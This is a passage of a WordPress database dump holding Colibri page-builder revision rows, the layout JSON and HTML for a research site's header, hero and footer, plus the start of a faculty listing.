255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"navigation\":{\"background\":{\"color\":\"transparent\"}}}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h5\",\"parentId\":\"25-h4\",\"partialId\":25,\"styleRef\":38,\"type\":\"header\"}],\"id\":\"25-h4\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":37,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"children\":[{\"name\":\"hop-spacer\",\"slot\":null,\"parentId\":\"25-h6\",\"index\":0,\"id\":\"25-h7\",\"partialId\":25,\"styleRef\":40,\"type\":\"header\"}],\"id\":\"25-h6\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":39,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"86.16\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h15\",\"parentId\":\"25-h14\",\"partialId\":25,\"styleRef\":47,\"type\":\"header\"}],\"id\":\"25-h14\",\"parentId\":\"25-h13\",\"partialId\":25,\"styleRef\":46,\"type\":\"header\"}],\"id\":\"25-h13\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":45,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"id\":\"25-h17\",\"parentId\":\"25-h16\",\"partialId\":25,\"styleRef\":49,\"type\":\"header\"}],\"id\":\"25-h16\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":48,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"25-h12\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":50,\"type\":\"header\"}],\"id\":\"25-h11\",\"parentId\":\"25-h10\",\"partialId\":25,\"styleRef\":44,\"type\":\"header\"}],\"id\":\"25-h10\",\"parentId\":\"25-h9\",\"partialId\":25,\"styleRef\":43,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\",\"priority\":1}},\"parentId\":\"25-h8\",\"index\":1,\"id\":\"25-h9\",\"partialId\":25,\"styleRef\":42,\"type\":\"header\"}],\"id\":\"25-h8\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":41,\"type\":\"header\"}],\"id\":\"25-h3\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":36,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"id\":\"25-h2\",\"partialId\":25,\"styleRef\":35,\"type\":\"header\",\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/twitter.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":54,\"slot\":null,\"parentId\":\"25-h20\",\"index\":0,\"id\":\"25-h21\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h20\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":53,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":56,\"slot\":null,\"parentId\":\"25-h22\",\"index\":0,\"id\":\"25-h23\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h22\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":55,\"type\":\"header\"}],\"id\":\"25-h19\",\"parentId\":\"25-h18\",\"partialId\":25,\"styleRef\":52,\"type\":\"header\"}],\"id\":\"25-h18\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":51,\"type\":\"header\"}]}},{\"name\":\"hop-hero\",\"props\":{\"anchor\":false,\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-page-title\",\"id\":\"25-h27\",\"parentId\":\"25-h26\",\"partialId\":25,\"styleRef\":60,\"type\":\"header\"}],\"id\":\"25-h26\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":59,\"type\":\"header\"},{\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"25-h28\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":278,\"type\":\"header\"}],\"parentId\":\"25-h24\",\"index\":0,\"id\":\"25-h25\",\"partialId\":25,\"styleRef\":58,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"type\":\"header\",\"id\":\"25-h24\",\"partialId\":25,\"styleRef\":57}],\"id\":\"25-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":25,\"styleRef\":34}','','','inherit','closed','closed','','26-revision-v1','','','2023-10-13 09:20:33','2023-10-13 13:20:33','',26,'https://gsudice.dataconn.net/?p=1715',0,'revision','',0),(1716,1,'2023-10-13 09:20:33','2023-10-13 13:20:33','<div data-colibri-id=\"25-h1\" class=\"page-header style-34 style-local-25-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"true\" role=\"banner\" class=\"h-navigation_outer h-navigation_overlap style-35-outer style-local-25-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"25-h2\" class=\"h-section h-navigation h-navigation d-flex style-35 style-local-25-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"25-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-36 style-local-25-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-37-outer style-local-25-h4-outer\">\n                <div data-colibri-id=\"25-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-37 style-local-25-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h5\" class=\"d-flex align-items-center text-lg-left text-md-left text-left justify-content-lg-start justify-content-md-start justify-content-start style-38 style-local-25-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-38-text style-local-25-h5-text\">[colibri_site_title]</span></a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-39-outer style-local-25-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"25-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-39 style-local-25-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h7\" class=\"style-40 style-local-25-h7 position-relative h-element\">\n                      <!---->\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-41-outer style-local-25-h8-outer\">\n                <div data-colibri-id=\"25-h8\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-41 style-local-25-h8 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h9\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-tablet h-menu-horizontal h-dropdown-menu style-42 style-local-25-h9 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"bordered-active-item bordered-active-item--bottom effect-borders-grow grow-from-center\" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"25-h10\" class=\"h-mobile-menu h-global-transition-disable style-43 style-local-25-h10 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-25-h10\" data-target-id=\"offcanvas-wrapper-25-h10\" data-offcanvas-overlay-id=\"offcanvas-overlay-25-h10\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-25-h10\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-43-offscreen style-local-25-h10-offscreen\">\n                          <div data-colibri-id=\"25-h11\" class=\"d-flex flex-column h-offscreen-panel style-44 style-local-25-h11 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h13\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-45 style-local-25-h13 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-46-outer style-local-25-h14-outer\">\n                                    <div data-colibri-id=\"25-h14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-46 style-local-25-h14 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"25-h15\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-47 style-local-25-h15 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-47-text style-local-25-h15-text\">[colibri_site_title]</span></a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h12\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-50 style-local-25-h12 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h16\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-48 style-local-25-h16 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-49-outer style-local-25-h17-outer\">\n                                    <div data-colibri-id=\"25-h17\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-49 style-local-25-h17 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                                        <!---->\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-25-h10\" class=\"offscreen-overlay style-43-offscreenOverlay style-local-25-h10-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"25-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-57 style-local-25-h24 position-relative\">\n    <!---->\n    <!---->\n    <div style=\"height: 70px; bottom: calc(0px);\" class=\"h-separator\">\n      <svg style=\"fill:#f6f8fa;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1000 100\" preserveAspectRatio=\"none\">\n        <g opacity=\"0.33\">\n          <path d=\"M385.42,52.92c-11.63,4.22-23.18,9-34.52,14.38-103.18,49-91.83-33.55-148.36-.49,50.13,17.35,121.87,64.84,270.46.49,11-4.7,64.52-25.43,118-41.8-4-.52-8.45-.95-13.41-1.28C507.83,41.64,455.4,71.84,385.42,52.92Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M0,59.7S48.08,103,116.06,83.43C54.25,76.6,0,39.8,0,39.8Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M916.4,48.1c-55.76,5.45-76.83,2-111.28-7.81-3.09,1.4-6.07,2.81-9,4.22,13.93,8.57,25.54,16.74,33.15,22.39,13,9.8,43,25.4,75.8,22.1S1000,59.7,1000,59.7V36.5s-6.87-4.5-21.48-9.06C966,36.56,946.56,45.15,916.4,48.1Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n        </g>\n        <g opacity=\"0.66\">\n          <path d=\"M771.65,30.49,766.1,28.9c-55-15.81-99.84-18-138.66-13.76a368.79,368.79,0,0,0-49.81,9.08c5,.33,9.44.76,13.41,1.28a89.13,89.13,0,0,1,13.86,2.7C656.8,44.1,688.5,67.3,734,67.3c19.82,0,38-11.12,62.15-22.79,2.9-1.41,5.88-2.82,9-4.22C795.39,37.52,784.59,34.23,771.65,30.49Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M371,48.4C242,1.8,242,5.4,184.8,20.6,128,35.8,132.3,44.9,89.9,52.5,28.6,63.7,0,0,0,0V39.8S54.25,76.6,116.06,83.43c28.46,3.15,58.53-.05,85.64-16.13l.84-.49c56.53-33.06,45.18,49.44,148.36.49,11.34-5.38,22.89-10.16,34.52-14.38Q378.34,51,371,48.4Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M978.52,27.44C993.13,32,1000,36.5,1000,36.5V0S996.54,14.27,978.52,27.44Z\" transform=\"translate(0 0)\"></path>\n        </g>\n        <path d=\"M0,0S28.6,63.7,89.9,52.5c42.4-7.6,38.1-16.7,94.9-31.9C242,5.4,242,1.8,371,48.4q7.33,2.61,14.42,4.52c70,18.92,122.41-11.28,192.21-28.7a368.79,368.79,0,0,1,49.81-9.08c38.82-4.21,83.68-2.05,138.66,13.76l5.55,1.59c12.94,3.74,23.74,7,33.47,9.8,34.45,9.83,55.52,13.26,111.28,7.81,30.16-3,49.63-11.54,62.12-20.66C996.54,14.27,1000,0,1000,0Z\"\n          transform=\"translate(0 0)\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"25-h25\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-58 style-local-25-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-59-outer style-local-25-h26-outer\">\n            <div data-colibri-id=\"25-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-59 style-local-25-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"25-h27\" class=\"page-title style-60 style-local-25-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-page-title__outer style-60-outer style-local-25-h27-outer\">\n                    <div class=\"h-global-transition-all\">[colibri_page_title tag=\"h1\"]</div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <!---->\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_post','','inherit','closed','closed','','25-revision-v1','','','2023-10-13 09:20:33','2023-10-13 13:20:33','',25,'https://gsudice.dataconn.net/?p=1716',0,'revision','',0),(1717,1,'2023-10-13 09:20:33','2023-10-13 13:20:33','{\"name\":\"hop-footer\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Footers\",\"attrs\":{\"id\":\"Footers\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-copyright\",\"slot\":null,\"parentId\":\"28-f4\",\"index\":0,\"id\":\"28-f5\",\"partialId\":28,\"styleRef\":270,\"type\":\"footer\"}],\"id\":\"28-f4\",\"parentId\":\"28-f3\",\"partialId\":28,\"styleRef\":269,\"type\":\"footer\"}],\"parentId\":\"28-f2\",\"index\":0,\"id\":\"28-f3\",\"partialId\":28,\"styleRef\":268,\"type\":\"footer\"}],\"id\":\"28-f2\",\"parentId\":\"28-f1\",\"partialId\":28,\"styleRef\":267,\"type\":\"footer\"}],\"id\":\"28-f1\",\"ui\":{\"isSelected\":false,\"isHovered\":false},\"type\":\"footer\",\"partialId\":28,\"styleRef\":266}','','','inherit','closed','closed','','29-revision-v1','','','2023-10-13 09:20:33','2023-10-13 13:20:33','',29,'https://gsudice.dataconn.net/?p=1717',0,'revision','',0),(1718,1,'2023-10-13 09:20:33','2023-10-13 13:20:33','<div data-enabled=\"true\" data-colibri-component=\"footer-parallax\" data-colibri-id=\"28-f1\" class=\"page-footer style-266 style-local-28-f1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"28-f2\" id=\"Footers\" class=\"h-section h-section-global-spacing d-flex align-items-lg-end align-items-md-end align-items-end style-267 style-local-28-f2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"28-f3\" class=\"h-row-container gutters-row-lg-1 gutters-row-md-1 gutters-row-2 gutters-row-v-lg-1 gutters-row-v-md-1 gutters-row-v-2 style-268 style-local-28-f3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-1 gutters-col-md-1 gutters-col-2 gutters-col-v-lg-1 gutters-col-v-md-1 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-269-outer style-local-28-f4-outer\">\n            <div data-colibri-id=\"28-f4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-1 h-px-md-1 h-px-2 v-inner-lg-1 v-inner-md-1 v-inner-2 style-269 style-local-28-f4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"28-f5\" class=\"style-270 style-local-28-f5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_copyright]© {year} {site-name}. Created for free using WordPress and\n                    <a target=\"_blank\" href=\"https://colibriwp.com\" rel=\"noopener\">Colibri</a>[/colibri_copyright]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','footer_post','','inherit','closed','closed','','28-revision-v1','','','2023-10-13 09:20:33','2023-10-13 13:20:33','',28,'https://gsudice.dataconn.net/?p=1718',0,'revision','',0),(1720,1,'2023-10-13 09:22:06','2023-10-13 13:22:06','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Faculty\",\"attrs\":{\"id\":\"faculty\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c4\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c5\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1697,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c6\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":2,\"id\":\"182-c7\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c8\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=C5PVPkoAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c9\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c10\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c11\",\"partialId\":182,\"styleRef\":978,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-Portrait